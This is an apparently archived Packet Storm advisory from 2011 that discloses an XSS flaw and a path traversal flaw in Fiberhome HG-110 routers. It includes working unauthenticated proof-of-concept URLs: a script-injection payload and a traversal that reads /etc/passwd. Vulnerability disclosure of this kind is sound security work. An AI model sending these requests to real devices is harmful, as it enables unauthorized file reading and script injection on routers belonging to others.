Fiberhome HG-110 Cross Site Scripting / Local File Inclusion

2011-04-08T00:00:00
ID PACKETSTORM:100234
Type packetstorm
Reporter Zerial
Modified 2011-04-08T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
I found two vulnerabilities on fiberhome hg-110 routers[1] and has not  
been reported nor fixed.  
  
XSS:  
- -  
http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns  
  
Local File Include and Directory/Path Traversal:  
  
- -  
http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns  
  
URLs are accessible without authentication.  
  
Device info:  
  
- - HardwareVersion : HG110_BH_R1A  
  
- - SoftwareVersion : HG110_BH_V1.6  
  
- - Firmware Version : 1.0.0  
  
  
This vulnerabilities can affect to other version and models of this vendor.  
  
  
[1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png  
- --   
Zerial  
Seguridad Informatica  
GNU/Linux User #382319  
Blog: http://blog.zerial.org  
Jabber: zerial@jabberes.org  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAk2fDfwACgkQIP17Kywx9JSPbwCfXNQs42kMMPcUiw5107MnABJ0  
PcUAniDsC0MZplJNquS0mXCtpidLk32r  
=UZbN  
-----END PGP SIGNATURE-----  
`